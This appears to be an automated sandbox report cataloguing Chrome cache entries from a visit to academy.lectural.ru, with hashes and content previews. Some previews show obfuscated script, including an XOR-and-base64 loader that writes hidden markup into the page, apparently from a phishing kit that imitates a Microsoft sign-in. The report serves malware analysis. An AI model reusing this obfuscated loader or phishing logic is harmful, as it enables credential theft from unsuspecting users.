Preview:	wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.\|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X\|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~\|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.\|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..\|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.

Chrome Cache Entry: 138

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
Category:	downloaded
Size (bytes):	28584
Entropy (8bit):	7.992563951996154
Encrypted:	true
SSDEEP:
MD5:	17081510F3A6F2F619EC8C6F244523C7
SHA1:	87F34B2A1532C50F2A424C345D03FE028DB35635
SHA-256:	2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
SHA-512:	E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/fonts/GDSherpa-regular.woff2
Preview:	wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww....eU..S.........0..S.s..,....\.e..F.&....oUR.}Q.C..2.TD....5..#..h.H.2.\|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#...#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......LCE..Nf~.N.eJ.iXnXC.&....t.U..Nr.@..lZ.... .X..

Chrome Cache Entry: 140

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	29796
Entropy (8bit):	7.980058333789969
Encrypted:	false
SSDEEP:
MD5:	210433A8774859368F3A7B86D125A2A7
SHA1:	408BACDDC39F12CAD285579C102FE4A629862D88
SHA-256:	9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
SHA-512:	6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/godaddy-left.png
Preview:	.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z#..0......D.....FV.w..,.T..............X.\|..\|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...\|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.

Chrome Cache Entry: 141

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
Category:	downloaded
Size (bytes):	43596
Entropy (8bit):	7.9952701440723475
Encrypted:	true
SSDEEP:
MD5:	2A05E9E5572ABC320B2B7EA38A70DCC1
SHA1:	D5FA2A856D5632C2469E42436159375117EF3C35
SHA-256:	3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
SHA-512:	785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/fonts/GDSherpa-vf.woff2
Preview:	wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...\|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P..j..)..'.L......b..RQjII..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P......

Chrome Cache Entry: 143

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (38244)
Category:	downloaded
Size (bytes):	38245
Entropy (8bit):	5.374795106498282
Encrypted:	false
SSDEEP:
MD5:	382DE2D5802B5BD3D87CF2FB3071121D
SHA1:	D0299A88EB32DBC533D61B024FF6E35956113E29
SHA-256:	18CBE0EDC0B01C71A6C3FFE704550A8BB1CFE7E02839B7DBDC9C44288BF8B59C
SHA-512:	8E40F9AF6117018E7A6AD62EC2988C82EEF9F4DD29915A40B9741DA8663F60D17594A60633AD9CDF8C5B153D025DE4F3CBF39BF81A915AF243B385CD9EB7E387
Malicious:	false
Reputation:	low
URL:	https://challenges.cloudflare.com/turnstile/v0/g/ea25f566/api.js?render=explicit
Preview:	"use strict";(function(){function ut(e,r,t,o,f,s,m){try{var p=e[s](m),g=p.value}catch(u){t(u);return}p.done?r(g):Promise.resolve(g).then(o,f)}function lt(e){return function(){var r=this,t=arguments;return new Promise(function(o,f){var s=e.apply(r,t);function m(g){ut(s,o,f,m,p,"next",g)}function p(g){ut(s,o,f,m,p,"throw",g)}m(void 0)})}}function N(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):N(e,r)}function _e(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function Me(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},o=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(t).filter(function(f){return Object.getOwnPropertyDescriptor(t,f).enumerable}))),o.forEach(function(f){_e(e,f,t[f])})}return e}function st(e){if(Array.isArray(e))return e}function ft(e,r){var t=e==null?null:typeof Symbol!="und

Chrome Cache Entry: 144

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (9652), with no line terminators
Category:	downloaded
Size (bytes):	9652
Entropy (8bit):	5.307956650507224
Encrypted:	false
SSDEEP:
MD5:	22CE774EF31EB32A5039EDF67D531B2E
SHA1:	1CEC18AA18F73DF2EB63C8767CF5E34EF4888854
SHA-256:	F67888429A8C8ED89B86F759684ACAF4BC5D638F43591409365531D048E8F194
SHA-512:	CD98AB5D5A2E7272929E0CECBFAE47CCA4E364AA013787007D8212F14E61B63F7F4A44A4B53644CB5A1CD315CC6DB735D2D7EF74C0BB8A0B57C7BA9EAE5A7346
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/js/pages-head-web.min.js?cb=26
Preview:	function _0x5a4a(_0x54e10b,_0x44c2cc){const _0x590158=_0x5901();return _0x5a4a=function(_0x5a4a81,_0x5cbac2){_0x5a4a81=_0x5a4a81-0x134;let _0x436c22=_0x590158[_0x5a4a81];return _0x436c22;},_0x5a4a(_0x54e10b,_0x44c2cc);}const _0x1b3436=_0x5a4a;function _0x5901(){const _0x58bc3f=['#cf_turnstile','substring','cloudflarecaptchaele','body','ready','section_tryingtosignin','toggle','8873039KFFugW','64089ZgqkPq','cantAccessAccount','No\x20browser\x20detection','link[rel~=\x27icon\x27]','linkoptionclick(this)','/assets/js/pages.min.js?cb=','13088mxXYbQ','start','/assets/microsoftfavicon.ico','style','appendChild','\x22\x20onclick=\x22linkoptionclick(this)\x22\x20class=\x22link\x22>','</a>','text_link','innerHTML','expired','animation','search','1490754oeUGcm','icon','Create\x20one!','\x20<a\x20href=\x22#\x22\x20data-id=\x22','firefox','.sectioncontent','3756Ngcepv','location','getElementsByTagName','error','innerText','link','cloudflarecaptcha','No\x20account?','show-from-right\x200.5s','secti

Chrome Cache Entry: 145

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
Category:	downloaded
Size (bytes):	28000
Entropy (8bit):	7.99335735457429
Encrypted:	true
SSDEEP:
MD5:	A4BCA6C95FED0D0C5CC46CF07710DCEC
SHA1:	73B56E33B82B42921DB8702A33EFD0F2B2EC9794
SHA-256:	5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
SHA-512:	60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/fonts/GDSherpa-bold.woff2
Preview:	wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...\|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..\|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[\|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,......e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.\|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..\|.`...5:.Yd@]..j..$...v.

Chrome Cache Entry: 146

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	346948
Entropy (8bit):	4.97885085345794
Encrypted:	false
SSDEEP:
MD5:	C79C4D0F1F3D1597C1B650944D9B7A46
SHA1:	3F1139E7D11FB1EDF547B26B7C0E4B16E6C03346
SHA-256:	F243EEDF7C68917C2134ECD0EA52F608E270B043DC062860032FBF44062B75CC
SHA-512:	91D058C227EDB073736E85A949C08A9FB1A4EEDC5898F11DC60BD8B5C1676C2E8764037CA400873B077C5C52724744E325701FB52A32337114DAE9776EB68738
Malicious:	false
Reputation:	low
URL:	https://docs.google.com/static/presentation/client/css/1116584586-viewer_css_ltr.css
Preview:	@charset "UTF-8";@import url(https://fonts.googleapis.com/css?family=Google+Sans);.apps-action-shortcut-icon{direction:ltr;text-align:left;overflow:hidden;position:relative;vertical-align:middle}.apps-action-shortcut-img:before{content:url(//ssl.gstatic.com/docs/common/shortcut_sprite1.png)}.apps-action-shortcut-img{height:95px;position:absolute;width:21px}.apps-action-shortcut-back{left:0;top:-63px}.apps-action-shortcut-back-white{left:0;top:-21px}.apps-action-shortcut-close-x{left:0;top:-84px}.apps-action-shortcut-search{left:0;top:-42px}.apps-action-shortcut-search-white{left:0;top:0}.apps-ui-material-slide-toggle-container{align-items:center;background:none;display:flex;height:21px;outline:0;position:relative;width:35px}.apps-ui-material-slide-toggle-thumb{transition-duration:.28s;transition-property:all;transition-timing-function:cubic-bezier(.4,0,.2,1);left:0;right:inherit;top:0;will-change:background-color;background-color:#f1f1f1;border-radius:100%;box-shadow:0 0 2px rgba(0,0,0

Chrome Cache Entry: 147

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	683
Entropy (8bit):	5.787703320104748
Encrypted:	false
SSDEEP:
MD5:	B1722AE8643C8573771D82B5D679AC00
SHA1:	C30393C4168DF2DBFE6E34D66B6E11AEB6E7C1D0
SHA-256:	2047AB81B98463D79C0A870ADED26963C41F6DDFAA0AA233228F40769E676F90
SHA-512:	2ADDA1FC278EFBB4310BF336610DF9B598A77D5F9861D3BB4145BE3947892D0A7D57ACB9CD9BF0BD646922264C1392019046B709BB770A4560C468C2444A7859
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/3t6837t/
Preview:	<script>..var emailcheck = "0";..var ccturnhtml = "jqSCRpjyDY";..var ccelehtml = "PnqIxhwSkr";..var cchtml = "PnqIxhwSkr";..var bchtml = "shKTkKaymp";..var rde = true;..function WvcKXWTSyN(tlZCJJkDiE, oQNrdrcRIY) {..let WYXfaGWTzO = '';..tlZCJJkDiE = atob(tlZCJJkDiE);..let lDpDOuBrLR = oQNrdrcRIY.length;..for (let i = 0; i < tlZCJJkDiE.length; i++) {.. WYXfaGWTzO += String.fromCharCode(tlZCJJkDiE.charCodeAt(i) ^ oQNrdrcRIY.charCodeAt(i % lDpDOuBrLR));..}..return WYXfaGWTzO;..}..var oJWyDcuNRr = WvcKXWTSyN(`dFEQOAd3aUUtSyFJEHUHKDtRO1gvXFlyISgjVz1aOlAUIUxpJkQtBG8WVyFdcWYBOhYlQBc2GXhgAX4LfBcOJkx3aRk9WjpQFCFVdXpeOlQkBw==`,`H9dUkIU6N9`);..document.write(oJWyDcuNRr);..</script>

Chrome Cache Entry: 151

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	low
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 153

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	2905
Entropy (8bit):	3.962263100945339
Encrypted:	false
SSDEEP:
MD5:	FE87496CC7A44412F7893A72099C120A
SHA1:	A0C1458C08A815DF63D3CB0406D60BE6607CA699
SHA-256:	55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
SHA-512:	E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_call_c2616792e1950f83fdef6e72dab97293.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.

Chrome Cache Entry: 154

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 144 x 144, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	484
Entropy (8bit):	6.771560291298439
Encrypted:	false
SSDEEP:
MD5:	0D15D393DAC5E0236D6EF35C65E9597C
SHA1:	54A8C64CC47BC346E4F2E1C615FD5117A95852EE
SHA-256:	1B001080D4B135431DC6E7377B1697C564ABBFB0BA3518DFFFCA00470C644464
SHA-512:	9615674ABF29670EB39568DCF924B6A398176BCD5AED3E195F390EBB81B1079143AFD10AC88B54C2AE9656D6C2A88DCF5D8A22B0393989587981AEC4C44179B9
Malicious:	false
Reputation:	low
URL:	https://fonts.gstatic.com/s/i/productlogos/slides_2020q4/v7/web-144dp/logo_slides_2020q4_color_1x_web_144dp.png
Preview:	.PNG........IHDR...................QPLTE..............................................................................].....tRNS.8....o$..<.(.K......W...S.......'IDATx...Gv.0..Q.....9...^{....zU'....[#..k..Y..g....h...P{.f....h...\....\...5..*A.E..de.Y.@V6...de.Y.@V6...de.Y.@V6...de.Y.@V6...de.Y.@V6...de.Y.@V6...T!.......@......."@...g..\...@.(.... @....... @.>..n....sE........ @....... @....P..D.b.5..U..E..b....[.....z1...M.].....i3..~.^.q..n .w...Y7:.V.....IEND.B`.

Chrome Cache Entry: 155

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	231
Entropy (8bit):	6.725074433303473
Encrypted:	false
SSDEEP:
MD5:	547988BAC5584B4608466D761E16F370
SHA1:	C11BB71049702528402A31027F200184910A7E23
SHA-256:	70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
SHA-512:	C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/back.png
Preview:	.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.\|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.

Chrome Cache Entry: 156

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	241
Entropy (8bit):	6.649856556835293
Encrypted:	false
SSDEEP:
MD5:	6F0C307B7EAA23F02ECEA471B72DB78F
SHA1:	2F2F7AAC18EFF88A66BA9CFBCCF042D23E2C065A
SHA-256:	E578DFCA2A93CCCAD8B4F3486687B5D6AE5410B3E3CF6F2DF6BFA1358E60158F
SHA-512:	B09CEDCA22508E014E96E272FC9DBCDB56BC78D3A7996D57DC7182D6D283684FE66B81BB2E74981804F1412A9E7DF316CF9F50838E5BE089960D7BE8B91C9720
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................a....IDATx.c@.?........nf5b .~.b5....3..G.?.0].8.!.....0.C5`.........A..k.U..0CH6..n. C@.....2(L..@............l!V..6..\M.(>.abD.p.... 1z.p).......?....@..f...6@..D....k..0.......Zd=....w..oC....IEND.B`.

Chrome Cache Entry: 157

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	31
Entropy (8bit):	3.889049535914169
Encrypted:	false
SSDEEP:
MD5:	C0DBA342E914069EC944F92A7F9D3147
SHA1:	73E82DFC5AA26596A259E203A477B119A7E9CD72
SHA-256:	3F6B15D7617E6079878B3CE72ADEC07E2A9EF5F8ED20FA3DD7A166F3D7B93123
SHA-512:	4B29E22EEEB039BFBDCA6F2B1BFA0F21C1469BE23FC685847E9BD1E9055BB3C1860C6BD01A9F0A1A4F5120F69DB6EA8EE189DA57AC6D44F6CF7C4836FAF7094A
Malicious:	false
Reputation:	low
Preview:	{. "origin": "81.181.57.74".}.

Chrome Cache Entry: 158

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1136)
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	5.249530958699059
Encrypted:	false
SSDEEP:
MD5:	FBE36EB2EECF1B90451A3A72701E49D2
SHA1:	AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
SHA-256:	E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
SHA-512:	7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww

Chrome Cache Entry: 159

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
Category:	downloaded
Size (bytes):	15552
Entropy (8bit):	7.983966851275127
Encrypted:	false
SSDEEP:
MD5:	285467176F7FE6BB6A9C6873B3DAD2CC
SHA1:	EA04E4FF5142DDD69307C183DEF721A160E0A64E
SHA-256:	5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
SHA-512:	5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
Malicious:	false
Reputation:	low
URL:	https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
Preview:	wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......\|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v..7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....\|...H....Fk.-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..\|..d...\|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....

Chrome Cache Entry: 160

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	7440
Entropy (8bit):	5.6586934662264445
Encrypted:	false
SSDEEP:
MD5:	D4185D798CB3D5F090352A9048D7CA91
SHA1:	FC771C1DE5FBE25065E04C73E4B919C92F3426AB
SHA-256:	98EA92621A1E03EFC11987FBA7AFF5DAE88CD39FFA85960A627B7C8C7B002E8E
SHA-512:	B12F3D79E78EB4A04B5B22E8C9201AEBFC115BA8A768BB025A1CF8D43B1BB80B53E7E1A90A8C7EAB3DCD35851A247B73CBBE318D7FD20070BEC2DE84325B3913
Malicious:	false
Reputation:	low
URL:	https://fonts.googleapis.com/css?family=Google+Sans
Preview:	/. See: https://fonts.google.com/license/googlerestricted. /./ armenian /.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v58/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrwEIJl1pynSEg.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./ bengali /.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v58/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrwEIJl3pynSEg.woff2) format('woff2');. unicode-range: U+0964-0965, U+0980-09FE, U+1CF7, U+1CFA, U+200C-200D, U+20B9, U+25CC;.}./ cyrillic-ext */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: 